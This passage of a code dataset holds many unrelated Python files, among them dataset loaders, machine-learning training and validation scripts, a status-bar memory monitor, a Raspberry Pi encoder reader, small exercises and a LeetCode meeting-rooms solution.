triplet[\"object_id\"] if is_person else triplet[\"person_id\"]\n actions[target_id, action_id] = 1\n else:\n num_instances_without_hoi_annotations += 1\n\n obj[\"actions\"] = actions\n obj[\"isactive\"] = 1 if len(hoi_triplets) > 0 else 0\n\n obj[\"bbox_mode\"] = BoxMode.XYWH_ABS\n\n if id_map:\n obj[\"category_id\"] = id_map[obj[\"category_id\"]]\n \n objs.append(obj)\n\n record[\"annotations\"] = objs\n dataset_dicts.append(record)\n\n if num_instances_without_hoi_annotations > 0:\n logger.warning(\n \"There are {} instances without hoi annotation.\".format(\n num_instances_without_hoi_annotations\n )\n )\n return dataset_dicts\n\n\ndef map_to_contiguous_id_within_image(hoi_triplets, anno_dict_list):\n \"\"\"\n Map annotation id in HOI triplets to contiguous index within the given image.\n For example, map {\"person_id\": 2001, \"object_id\": 2003, \"action_id\": 1} to\n {\"person_id\": 0, \"object_id\": 2, \"action_id\": 1}) if\n the annotation ids in this image start from 2001.\n\n Args:\n hoi_triplets (list[dict]): HOI annotations of an instance.\n anno_dict_list (list[dict]): annotations of all instances in the image.\n\n Returns:\n list[dict]: HOI annotations with contiguous id within the image.\n \"\"\"\n anno_id_to_contiguous_id = {ann['id']: ix for ix, ann in enumerate(anno_dict_list)}\n # This fails when annotation file is buggy. The dataset may contain person alone interactions,\n # (e.g., without interacting objects). The object index in this case is denoted as -1.\n anno_id_to_contiguous_id.update({-1: -1})\n\n for triplet in hoi_triplets:\n triplet['person_id'] = anno_id_to_contiguous_id[triplet['person_id']]\n triplet['object_id'] = anno_id_to_contiguous_id[triplet['object_id']]\n","sub_path":"lib/data/datasets/vcoco.py","file_name":"vcoco.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37550706","text":"#!/usr/bin/env python2\n\nimport sys\nimport json\nimport subprocess\n\nGREEN = \"#00FF00\"\nRED = \"#FF0000\"\nYELLOW = \"#FFFF00\"\n\ndef print_line(message):\n \"\"\" Non-buffered printing to stdout. \"\"\"\n sys.stdout.write(message + '\\n')\n sys.stdout.flush()\n\ndef read_line():\n \"\"\" Interrupted respecting reader for stdin. \"\"\"\n # try reading a line, removing any extra whitespace\n try:\n line = sys.stdin.readline().strip()\n # i3status sends EOF, or an empty line\n if not line:\n sys.exit(3)\n return line\n # exit on ctrl-c\n except KeyboardInterrupt:\n sys.exit()\n\ndef get_memory():\n total = 0\n available = 0\n with open(\"/proc/meminfo\") as m:\n for line in m:\n k,v = line.split(\":\")\n k,v = k.strip(), int(v.strip().split(\" \")[0])/1024.0/1024.0\n if k.startswith(\"MemTotal\"):\n total = v\n elif k.startswith(\"MemAvailable\"):\n available = v\n\n col = GREEN\n if (available < 0.2 * total):\n col = YELLOW\n if (available < 0.1 * total):\n col = RED\n return col, \"{:.1f}g / {:.1f}g\".format(available, total)\n\nif __name__ == '__main__':\n # Skip the first line which contains the version header.\n print_line(read_line())\n\n # The second line contains the start of the infinite array.\n print_line(read_line())\n\n while True:\n line, prefix = read_line(), ''\n # ignore comma at start of lines\n if line.startswith(','):\n line, prefix = line[1:], ','\n\n j = json.loads(line)\n # insert information into the start of the json, but could be anywhere\n # CHANGE THIS LINE TO INSERT SOMETHING ELSE\n\n mem_color, mem = get_memory()\n\n j.insert(0, {'full_text' : '%s' % mem, 'name' : 'mem', 'color' : mem_color})\n\n # and echo back new encoded json\n print_line(prefix+json.dumps(j))\n\n","sub_path":"home/.i3/mystatus.py","file_name":"mystatus.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"359258789","text":"#!/usr/bin/env python3\n# Copyright (c) 2008-11 Qtrac Ltd. All rights reserved.\n# This program or module is free software: you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version. It is provided for educational\n# purposes and is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n\nimport sys\nimport unicodedata\n\n\ndef print_unicode_table(wordList):\n print(\"decimal hex chr {0:^40}\".format(\"name\"))\n print(\"------- ----- --- {0:-<40}\".format(\"\"))\n\n code = ord(\" \")\n end = min(0xD800, sys.maxunicode) # Stop at surrogate pairs\n\n while code < end:\n c = chr(code)\n name = unicodedata.name(c, \"*** unknown ***\")\n # match all occurences\n if word is None: \n print(\"{0:7} {0:5X} {0:^3c} {1}\".format(code, name.title()))\n else:\n all_match = True\n for wd in wordList:\n if wd not in name.lower():\n all_match = False\n break\n if (all_match):\n print(\"{0:7} {0:5X} {0:^3c} {1}\".format(code, name.title())) \n code += 1\n\n\nword = None\nwordList = []\nnumArg = len(sys.argv)\nhelp = False\nif numArg > 1:\n if sys.argv[1] in (\"-h\", \"--help\"):\n print(\"usage: {0} [string] [string] ...\".format(sys.argv[0]))\n help = True\n else:\n for k in range(1, numArg):\n word = sys.argv[k].lower()\n wordList.append(word)\n\nif help == False:\n print_unicode_table(wordList)\n","sub_path":"Mypy/p31ex/print_unicode_mod.py","file_name":"print_unicode_mod.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"369453328","text":"# Lab 1 - Guess the Number Game, Version 1\n# Version 1 is also the full version.\n# It read's the users guess\n# It displays the value selected by the program, and then the user's guess\n\n\nimport random\n\ndef main():\n # display instructions\n print('I am thinking of a number between 1 and 10.')\n program_selection = random.randint(1,10) # randomly pick an integer between 1 and 10\n \n user_guess = input('What is the number?') # get player guess\n print('The number was ' + str(program_selection) + '.')\n print('You guessed ' + str(user_guess) + '.')\n \nmain()","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"501275064","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle as sh\nfrom sklearn.metrics import confusion_matrix\nfrom utils import to_categorical\nfrom metrics import get_roc_curve\nfrom models import FactoryModel\nimport numpy as np\n\nclass ValidationFactory:\n def __init__(self, name, trainner, x, state=None):\n self.validator = None\n if name == 'kfold':\n self.validator = KFoldCustom(k=x, trainner=trainner, state=state)\n elif name == 'holdout':\n self.validator = Holdout(test_size=x, trainner=trainner, state=state)\n \nclass Holdout:\n def __init__(self, test_size, trainner, state=None):\n self.trainner = trainner\n self.test_size = test_size\n self.state = state.get_state_validation(valid_name='holdout', h=test_size*100)\n\n def add_score(self, metrics, dict_scores, scores):\n for i, metric in enumerate(metrics):\n dict_scores[metric] = []\n dict_scores[metric].append(scores[i])\n\n def execute(self, inputs, targets, config_model=None, dataset_name=''):\n model = FactoryModel(\n config_model['name'],\n '{}_{}_holdout-{}'.format(dataset_name, config_model['name'], self.test_size),\n config_model['size'],\n config_model['params'],\n config_model['init']).get_model()\n\n if self.state.epochs > 0:\n model().load_weights(self.state.weights)\n else:\n #initialize weight and history path for the model\n self.state.weights += model().name + '.h5'\n self.state.history += '{}/history_{}.csv'.format(config_model['name'], model().name)\n\n dict_scores = {}\n dict_scores['scores'] = {}\n dict_scores['scores']['model'] = [model().name]\n\n print('\\n------[executing Hold out {} for {} model]------------------'.format(self.test_size*100, model().name))\n train_x, test_x, train_y, test_y = train_test_split(inputs,\n targets, \n test_size=self.test_size,\n random_state=0, \n shuffle=False)\n history = self.trainner.train_model(train_x,\n to_categorical(train_y),\n model(),\n validation_data=(test_x,to_categorical(test_y)),\n init_epoch=self.state.epochs\n )\n\n print('Avaluating model-------------------------------------------------------------')\n scores = model().evaluate(test_x, to_categorical(test_y))\n\n self.add_score(model().metrics_names, dict_scores['scores'], scores)\n\n\n (fpr, tpr, auc) = get_roc_curve(to_categorical(test_y), model().predict(test_x))\n dict_scores['roc'] = (fpr, tpr, auc)\n dict_scores['history'] = [history]\n dict_scores['cm'] = confusion_matrix(test_y, np.argmax(model().predict(test_x), axis=1))\n\n print(\"Result for the {} model\".format(model().name))\n print(dict_scores['scores'])\n\n self.state.status = True\n \n return dict_scores\n\nclass KFoldCustom:\n def __init__(self, k, trainner=None, state=None):\n self.k = k\n self.trainner = trainner\n self.state = state.get_state_validation(valid_name='kfold', k=k) if trainner != None else None\n self.state_i = self.state.current_k if state != None else 1\n \n def split(self, X):\n n = X.shape[0]\n dataset = np.arange(0, n, dtype=int)\n while self.state_i <= self.k:\n idx = np.arange(n * (self.state_i - 1) / self.k, n * self.state_i / self.k, dtype=int)\n yield np.array(list(set(dataset) - set(idx))), idx\n self.state_i += 1\n\n def execute(self, inputs, targets, config_model=None, dataset_name=''):\n \n print('\\n------[executing {}-fold for {} model]------------------'.format(self.k, config_model['name']))\n scores_dict = {}\n scores_dict['scores'] = {}\n scores_dict['scores']['model'] = [config_model['name']]\n fprs = []\n tprs = []\n aucs = []\n scores = []\n cms = []\n\n #training\n n_fold = self.state_i\n for train, test in self.split(inputs):\n print('\\n{}-fold'.format(n_fold))\n model = FactoryModel(\n config_model['name'],\n '{}_{}_kfold-{}_{}'.format(dataset_name, config_model['name'], self.k, n_fold),\n config_model['size'],\n config_model['params']).get_model()\n \n \n if self.state.get_epochs(self.state_i - 1) > 0:\n model().load_weights(self.state.get_weights(self.state_i - 1))\n else:\n #initialize weight and history path for the model i\n self.state.weights[self.state_i - 1] += model().name + '.h5'\n self.state.historys[self.state_i - 1] += '{}/history_{}.csv'.format(config_model['name'], model().name)\n\n\n self.trainner.train_model(inputs[train],\n to_categorical(targets[train]), \n model(),\n validation_data=(inputs[test], to_categorical(targets[test])),\n init_epoch=self.state.get_epochs(self.state_i - 1),\n )\n n_fold += 1\n self.state.current_k = n_fold\n\n self.state_i = 1\n n_fold = self.state_i\n for train, test in self.split(inputs):\n print('\\nAvaluating {}-fold model\\n'.format(n_fold))\n model = FactoryModel(\n config_model['name'],\n config_model['name']+ '_k{}'.format(n_fold),\n config_model['size'],\n config_model['params']).get_model()\n\n model().load_weights(self.state.get_weights(self.state_i-1))\n\n scores_model = model().evaluate(inputs[test], to_categorical(targets[test]))\n\n #roc curve and auc\n (fpr, tpr, auc) = get_roc_curve(to_categorical(targets[test]), model().predict(inputs[test]))\n\n #get confunsion matrix\n cms.append(\n confusion_matrix(\n targets[test], \n np.argmax(model().predict(inputs[test]), axis=1)\n )\n )\n\n fprs.append(fpr)\n tprs.append(tpr)\n aucs.append(auc)\n \n # historys.append(history)\n scores.append(scores_model)\n n_fold += 1\n\n scores = np.array(scores)\n for i, m in enumerate(model().metrics_names):\n scores_dict['scores'][m] = [scores[:,i].mean()]\n\n roc_max = (fprs[0], tprs[0], aucs[0])\n\n for i in range(len(aucs)):\n if roc_max[2] > aucs[i]:\n roc_max = (fprs[i], tprs[i], aucs[i])\n\n #mean confusion matrix\n cm_mean = np.zeros(cms[0].shape)\n for cm in cms:\n cm_mean += (cm/cms[0].shape[0]).astype('int32')\n\n cm_mean = cm_mean.astype('int32')\n \n scores_dict['roc'] = roc_max\n # scores_dict['history'] = historys\n scores_dict['cm'] = cm_mean\n \n print(\"Result for the {} model\".format(model().name))\n print(scores_dict['scores'])\n\n self.state.statu = True\n\n return scores_dict\n\nif __name__ == '__main__':\n kfold = KFoldCustom(3, None)\n\n for train, test in kfold.split(np.array([1,2,3,4,5,6])):\n print(train, test)\n\n","sub_path":"src/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"458373563","text":"\"\"\"\nPurpose\n=======\n Check that Confluent-Kafka version on its respective Nodes are as User Specified\n\nTest Steps\n==========\n 1. Goto to shell\n 2. Execute \"rpm -qa | grep -i \"componentName\" | grep \"version\"\" and check that Confluent-Kafka version on all Confluent-Kafka machines are as User Specified\n\"\"\"\nfrom potluck.nodes import connect, get_nodes_by_type\nfrom potluck.logging import logger\nfrom potluck.reporting import report\nfrom potluck.parsing import parser\nobj_parser = parser()\nversiondict ={}\n\n### Creating A dictionary with Structure [Component]:[Version] ###\nversiondict = obj_parser.create_dict_version(\"userinput/version_info_old.txt\")\nversion=versiondict[\"CONFLUENT-KAFKA\"]\n\nconfluent_kafkanodes = get_nodes_by_type(\"CONFLUENT-KAFKA\")\n\nif (not confluent_kafkanodes):\n report.fail(\"No Confluent-Kafka nodes in the testbed \")\n\nfor node_alias in confluent_kafkanodes:\n logger.info(\"Checking that Confluent-Kafka version on all Avro machines are as User Specified\")\n node = connect(node_alias)\n flag = node.grepVersion(\"Confluent-Kafka\",version)\n if flag ==1:\n logger.info(\"Confluent-Kafka version on all Avro nodes are as User Specified\")\n else:\n report.fail(\"Confluent-Kafka version on all Avro machines are not as User Specified\")\n\n","sub_path":"ciTool/Potluck_cloudera/Testcases/solution/Platform/verify_confluent_kafka_version.py","file_name":"verify_confluent_kafka_version.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"64750001","text":"def dfs(sum, num, arr, start, n):\n if num==0:\n if sum==n:\n return True\n else:\n return False\n for i in range(start,10):\n arr.append(i)\n if dfs(sum+i, num-1, arr, i+1, n):\n return True\n else:\n arr.remove(i)\n \n\nif __name__=='__main__':\n container=eval(input())\n n=container[1]\n k=container[0]\n arr=[]\n result=[]\n for i in range(1, 9):\n if dfs(0, k, arr, i, n):\n result.append(arr.copy())\n arr.clear()\n print(result)\n\n\n","sub_path":"Code/CodeRecords/2739/60617/256784.py","file_name":"256784.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414447016","text":"import nengo\n\nimport nengo_pushbot\nimport numpy as np\n\nmodel = nengo.Network()\nwith model:\n #input = nengo.Node(lambda t: [0.5*np.sin(10*t), 0.5*np.cos(10*t)])\n\n input = nengo.Node([0.5, -0.5])\n a = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n b = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n c = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n d = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n\n #nengo.Connection(a, b, filter=0.01)\n #nengo.Connection(b, c, filter=0.01)\n #nengo.Connection(c, d, filter=0.01)\n\n #nengo.Connection(a, a, transform=[[1.1, 0], [0, 1.1]], filter=0.1)\n #b = nengo.Ensemble(nengo.LIF(100), dimensions=2)\n\n bot = nengo_pushbot.PushBot(address=(0xFE, 0xFF, 1, 0, 0))\n\n tracks = nengo_pushbot.Tracks(bot)\n #def printout(t, x):\n # print t, x\n # return []\n #tracks2 = nengo.Node(printout, size_in=2)\n\n nengo.Connection(input, a, filter=0.01)\n nengo.Connection(a, b, filter=0.01)\n nengo.Connection(b, c, filter=0.01)\n nengo.Connection(c, d, filter=0.01)\n nengo.Connection(d, tracks, filter=0.01)\n #nengo.Connection(b, tracks2, filter=0.01)\n\n#sim_normal = nengo.Simulator(model)\n#sim_normal.run(5)\n\nimport nengo_spinnaker\nsim = nengo_spinnaker.Simulator(model)\nsim.run(10)\n\n","sub_path":"examples/test_spinn_tracks2.py","file_name":"test_spinn_tracks2.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212178842","text":"import pandas as pd\nimport numpy as np\nimport librosa \nimport csv\nimport random\nimport sys\nimport time\n\n# Extraction of the 50 most used labels and paths\n\ndf_sounds=pd.read_csv(\"raw_magnatagatune_data/annotations_final.csv\", header=None, sep='\\t')\n\ndataset_sound= df_sounds.values\n\nLabels = dataset_sound[1:len(dataset_sound),1:51].astype(float) # We dont want header / we convert to float to be able to use it later.\nPath = dataset_sound[1:len(dataset_sound),189:190].astype(str) # We dont want the header / Here we need to keep the paths as strings as it is the requiered format.\n\n\nk = 0\nfor i in range(1,len(dataset_sound[0])-1): # =189 (We neither want to look at the id column nor at the path column)\n\tsom = 0\n\tfor s in range(1, len(dataset_sound)): # We dont care about the header\n\t\tsom += int(dataset_sound[s, i]) \n\tif (som > 475):\n\t\tfor j in range(1,len(dataset_sound)):\n\t\t\tLabels[j-1,k] = dataset_sound[j,i]\n\t\tk = k + 1\n\nnp.savetxt('databases/labels_Mtatune.csv', Labels, delimiter=',')\n\nfor j in range(1,len(dataset_sound)): # No header\n\tPath[j-1] = dataset_sound[j,len(dataset_sound[0])-1] # We load the last column, which corresponds to the path.\n\n\n\n\nTaille_sousB = len(Path)\n\nwith open(\"databases/dbwhole.csv\", \"wb\") as db:\n\twriter = csv.writer(db)\n\tfor i in range(Taille_sousB): # taillesousb\n\t\ttry:\n\t\t\tX, sample_rate = librosa.load(\"raw_magnatagatune_data/\"+Path[i][0], res_type='kaiser_fast', sr = 16000)#, sr = 16000) # Probably an error due to try : if someting fails X stays empty at the line of the failed event. ed error line\"+str(i))\n\t\t\tX[len(X) - 1] = i\n\t\t\twriter.writerow(X)\n\t\texcept:\n\t\t\tprint(\"unexpected error line\" + str(i))\n","sub_path":"Create_Magnatagatune_dataset.py","file_name":"Create_Magnatagatune_dataset.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"411031334","text":"import RPi.GPIO as io\nimport time\nimport datetime\nimport math\n\nio.setmode(io.BOARD)\n\n# sensor 1\nen1_pin = 35\nio.setup(en1_pin, io.IN, pull_up_down=io.PUD_UP)\n\n# sensor 2\nen2_pin = 33\nio.setup(en2_pin, io.IN, pull_up_down=io.PUD_UP)\n\n# encoder 1\nencoder1_sensors = [en1_pin, en2_pin]\nA1_old = 0\nencoder1_count = 0\n\ndef encoder1Callback(channel):\n\t# this function is called when an encoder reading is detected\n\tglobal A1_old, encoder1_count\n\tif io.input(channel):\n\t\tA = 1\n\telse:\n\t\tA = 0\n\tif io.input(encoder1_sensors[1]):\n\t\tB = 1\n\telse:\n\t\tB = 0\n\tif A != A1_old:\n\t\tif A != B:\n\t\t\tencoder1_count += 1\n\t\telse:\n\t\t\tencoder1_count -= 1\n\tA1_old = A\n\t\ndef initializeEncoders():\n\tglobal encoder1_count\n\tencoder1_count = 0;\n\t\ndef countstorad(count):\n\t# returns the joints space angle in radians\n\trad = 2*math.pi*count/8/48\n\treturn rad\t\n\nio.add_event_detect(en1_pin, io.BOTH, callback=encoder1Callback)\nwhile True:\n\tprint(countstorad(encoder1_count))\n\tenter = raw_input(\"Press to continue: \")","sub_path":"encoder_test.py","file_name":"encoder_test.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"597615021","text":"import tensorflow as tf\nimport tensorlayer as tl\nimport numpy as np\nfrom PIL import Image\nimport io\nimport os\nimport os\nimport sys \nimport numpy as np\nimport time\nfrom scipy.misc import imread, imresize\nfrom load_data import *\n\n#Read data\npath = \"data/train\" \nfilename_train = \"train.tfrecords\"\nfilename_val = \"validation.tfrecords\"\n\nnum_of_train, num_of_val = image_folder_to_tfrecord(path, filename_train, filename_val)\n\nimg_train, label_train = read_and_decode(filename_train, is_train=True)\nimg_val, label_val = read_and_decode(filename_val, is_train=False)\n\nbatch_size = 100\nimg_batch_train, label_batch_train = tf.train.shuffle_batch([img_train, label_train],\n batch_size=batch_size,\n capacity=2000,\n min_after_dequeue=1000,\n num_threads=16\n )\n\nimg_batch_val, label_batch_val = tf.train.shuffle_batch([img_train, label_train],\n batch_size=(batch_size/6),\n capacity=2000,\n min_after_dequeue=1000,\n num_threads=16\n )\n\n#Input and placeholder\nx = tf.placeholder(tf.float32, [None, 224, 224, 3])\ny_ = tf.placeholder(tf.int32, shape=[None, ], name='y_')\ncost_train, acc_train = inference(x, y_, reuse=None, is_train=True,)\ncost_val, cost_val =inference(x, y_, reuse=True, is_train=False)\n\nsess = tf.InteractiveSession()\n#Load VGG16\nnpz = np.load('vgg16_weights.npz')\n\nparams = []\nfor val in sorted( npz.items() ):\n print(\" Loading %s\" % str(val[1].shape))\n params.append(val[1])\n\n#tl.files.assign_params(sess, params[:-3], network_train)\n\n#Optimizer\nn_epoch = 60\nlearning_rate = 0.0001\nprint_freq = 1\nn_step_epoch = int(num_of_train/batch_size)\nn_step = n_epoch * n_step_epoch\n\nwith tf.device('/gpu:0'):\n #Will be changed\n optimizer = tf.train.AdamOptimizer(learning_rate, \n beta1=0.9, \n beta2=0.999,\n epsilon=1e-08, \n use_locking=False)\n train_op = optimizer.minimize(cost_train,\n var_list=train_params)\n\n sess.run(tf.initialize_all_variables())\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n step = 0\n\n for epoch in range(n_epoch):\n start_time = time.time()\n train_loss, train_acc, n_batch = 0, 0, 0\n for s in range(n_step_epoch):\n data_train, label_train = sess.run([img_batch_train, label_batch_train])\n err, ac, _ = sess.run([cost_train, acc_train, train_op], feed_dict={x: data_train, y_: label_train})\n step += 1\n train_loss += err; train_acc += ac; n_batch += 1\n\n if epoch + 1 == 1 or (epoch + 1) % print_freq == 0:\n print(\"Epoch %d : Step %d-%d of %d took %fs\" % (epoch, step, step + n_step_epoch, n_step, time.time() - start_time))\n print(\" train loss: %f\" % (train_loss/ n_batch))\n print(\" train acc: %f\" % (train_acc/ n_batch))\n \n val_loss, val_acc, n_batch = 0, 0, 0\n for _ in range(int(num_of_val/int(batch_size/6))):\n data_val, label_val = sess.run([img_batch_val, label_batch_val])\n err, ac = sess.run([cost_val, acc_val], feed_dict={x:data_val, y_:label_val})\n val_loss += err; val_acc += ac; n_batch += 1\n print(\" val loss: %f\" % (val_loss/ n_batch))\n print(\" val acc: %f\" % (val_acc/ n_batch))\n\n coord.request_stop()\n coord.join(threads)\n\nprint(\"Save model \" + \"!\"*10)\nsaver = tf.train.Saver()\nsave_path = saver.save(sess, \"model.ckpt\")\nsess.close()","sub_path":"Fishirie/vgg_basic.py","file_name":"vgg_basic.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"7991018","text":"import numpy as np\nimport keras\nfrom keras.datasets import mnist\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.regularizers import l2\nfrom keras import backend as K\n\ndata_path = \"/home/unagpal/mnist/\"\ntrain_data = np.loadtxt(data_path + \"mnist_train.csv\", \n delimiter=\",\")\ntest_data = np.loadtxt(data_path + \"mnist_test.csv\", \n delimiter=\",\") \ny_train_All = train_data[:,0]\ny_test = test_data[:,0]\nX_train_All = train_data[:,1:].reshape((60000,28,28))\nX_test = test_data[:,1:].reshape((10000,28,28)) \n#(X_train_All, y_train_All), (X_test, y_test) = mnist.load_data()\ntrain_ind = np.concatenate((np.argwhere(y_train_All==1), np.argwhere(y_train_All==7))).flatten()\ntest_ind = np.concatenate((np.argwhere(y_test==1), np.argwhere(y_test==7))).flatten()\ny_test = y_test[test_ind]\ny_test[y_test==7] = 0\ny_test_original = y_test\ny_test = keras.utils.to_categorical(y_test, num_classes=2)\nX_test = np.expand_dims(X_test[test_ind], axis=1)\nfolder_path = \"/home/unagpal/mnist/\"\n\n#AL Parameters\n#train_size_init = 6\ndropout_prob = 0.25\nnum_experiments = 3\nnum_acquisitions = 400 \n\n#Keras Model Parameters\nnum_classes = 2\nnb_filters = 30\nnb_pool = 3\nnb_conv = 4\nimg_rows = img_cols = 28\n\n#Used for calculating test acc (average of MC dropout predictions)\ndef predict_with_uncertainty(f, x, n_iter=100):\n result = np.zeros((n_iter,x.shape[0], 2))\n for i in range(n_iter):\n predictions = np.array(f((x, 1))[0])\n result[i,:, :] = predictions\n prediction = result.mean(axis=0)\n return prediction\n\ndef run_model (train_data_indices):\n X_train = np.expand_dims(X_train_All[train_data_indices], axis=1)\n y_train = y_train_All[train_data_indices]\n y_train[y_train==7] = 0\n y_train = keras.utils.to_categorical(y_train, num_classes=2)\n train_size = y_train.shape[0]\n Weight_Decay = 2.5/train_size\n dropout_prob = 0.25\n batch_size=128\n nb_filters = 30\n nb_pool = 3\n nb_conv = 4\n img_rows = img_cols = 28\n nb_classes = 2\n model = Sequential()\n model.add(Convolution2D(nb_filters, nb_conv, strides=1, data_format=\"channels_first\", input_shape=(1, img_rows, img_cols)))\n model.add(Activation('relu'))\n model.add(Dropout(dropout_prob))\n model.add(Convolution2D(nb_filters, nb_conv, strides=2))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\n model.add(Flatten())\n model.add(Dropout(dropout_prob))\n model.add(Dense(100, W_regularizer=l2(Weight_Decay)))\n model.add(Activation('relu'))\n model.add(Dropout(dropout_prob))\n model.add(Dense(nb_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n hist = model.fit(X_train, y_train, epochs=60, steps_per_epoch=100, verbose=0)\n f_rand = K.function([model.layers[0].input, K.learning_phase()],[model.layers[-1].output])\n y_test_output = predict_with_uncertainty(f_rand, X_test, n_iter=100)\n y_test_predictions = np.argmax(y_test_output, axis=1)\n return np.sum(y_test_predictions==y_test_original)/(y_test_original.shape[0])\n\nall_acc = []\nall_tr_ind = []\nfor e in range(num_experiments):\n exp_acc = []\n all_acc.append(exp_acc)\n #Initial training/accuracy\n train_data_indices = list(np.load(folder_path + 'trainindices' + str(e+1) + '.npy'))\n all_tr_ind.append(train_data_indices)\n pool_indices = [i for i in train_ind if i not in train_data_indices]\n exp_acc.append(run_model(train_data_indices))\n for acq in range(num_acquisitions):\n new_ind_ind = np.random.choice(len(pool_indices))\n train_data_indices.append(pool_indices[new_ind_ind])\n del pool_indices[new_ind_ind]\n exp_acc.append(run_model(train_data_indices))\n all_acc[-1] = exp_acc\n all_tr_ind[-1] = train_data_indices\n print('all acc: ' + str(all_acc))\n print('all ind: ' + str(all_tr_ind))\n np.save(folder_path+'RandomAcqAcc.npy', np.array(all_acc))\n np.save(folder_path+'RandomAcqInd.npy', np.array(all_tr_ind))\nprint('All Acc: ' + str(all_acc))\n","sub_path":"Active Learning Experiments/Fall2019Results/RandomAcqBinary.py","file_name":"RandomAcqBinary.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"182988467","text":"\"\"\"\n给定一个会议时间安排的数组,每个会议时间都会包括开始和结束的时间 [[s1,e1],[s2,e2],...] (si < ei),为避免会议冲突,同时要考虑充分利用会议室资源,请你计算至少需要多少间会议室,才能满足这些会议安排。\n\n示例 1:\n\n输入: [[0, 30],[5, 10],[15, 20]]\n输出: 2\n\n示例 2:\n\n输入: [[7,10],[2,4]]\n输出: 1\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/meeting-rooms-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nimport heapq # heapq为最小堆排序算法\n\n\nclass Solution:\n def minMeetingRooms(self, intervals: [[int]]) -> int:\n # 比较最小堆中最小数与开始会议时间是否冲突\n if not intervals:\n return 0\n intervals = sorted(intervals, key=lambda x: x[0])\n meeting_list = []\n start_list = [x[0] for x in intervals]\n end_list = [x[1] for x in intervals]\n heapq.heapify(meeting_list)\n heapq.heappush(meeting_list, end_list[0])\n for i in range(1, len(start_list)):\n earlist = heapq.heappop(meeting_list)\n if start_list[i] < earlist:\n heapq.heappush(meeting_list, earlist)\n heapq.heappush(meeting_list, start_list[i])\n return len(meeting_list)\n\n def minmeetingrooms2(self, intervals):\n if not intervals:\n return 0\n used_room = 0\n start_timings = sorted(i[0] for i in intervals)\n end_timings = sorted(i[1] for i in intervals)\n L = len(intervals)\n end_p = 0\n start_p = 0\n while start_p < L:\n if start_timings[start_p] >= end_timings[end_p]:\n used_room -= 1\n end_p += 1\n used_room += 1\n start_p += 1\n return used_room\n\n\nif __name__ == '__main__':\n d = Solution()\n print(d.minMeetingRooms([[0, 30], [5, 10], [15, 20]]))\n print(d.minmeetingrooms2([[0, 30], [5, 10], [15, 20]]))\n","sub_path":"minMeetingRooms.py","file_name":"minMeetingRooms.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13337645","text":"import math\n\nclass VGuard:\n#tunnelLowFlows - ordered list of triples (flowPritority, flowIntensity flowID)\n#tunnelHighFlows - ordered list of triples (flowPritority, flowIntensity, flowID)\n# flowPriority - float number (0 ~ 1)\n# flowIntensity - integer\n# flowID - string\n tunnelLowFlows = []\n tunnelHighFlows = []\n\n#tunnelLowUse - bandwidth use of low tunnel (integer)\n#tunnelHighUse - bandwidth use of high tunnel (integer)\n tunnelLowUse = 0\n tunnelHighUse = 0\n\n#tunnelLowUse - bandwidth capacity of low tunnel (integer)\n#tunnelHighUse - bandwidth capacity of high tunnel (integer)\n tunnelLowCapacity = 0\n tunnelHighCapacity = 0\n\n#tunnelHighNormal - normal bandwidth use of high tunnel (float 0 ~ 1)\n#tunnelHighSum - priorities sum from tunnelHighFlows\n#tunnelLowPrioritySum - priorities sum from tunnelLowFlows\n tunnelHighNormal = 0\n tunnelHighSum = 0\n tunnelLowSum = 0\n\n#tunnelLowDrop - traffic drop by tunnel low filter for each flow (integer)\n#tunnelLowDropRate - total traffic dropped vy the filter (integer)\n tunnelLowDrop = {}\n 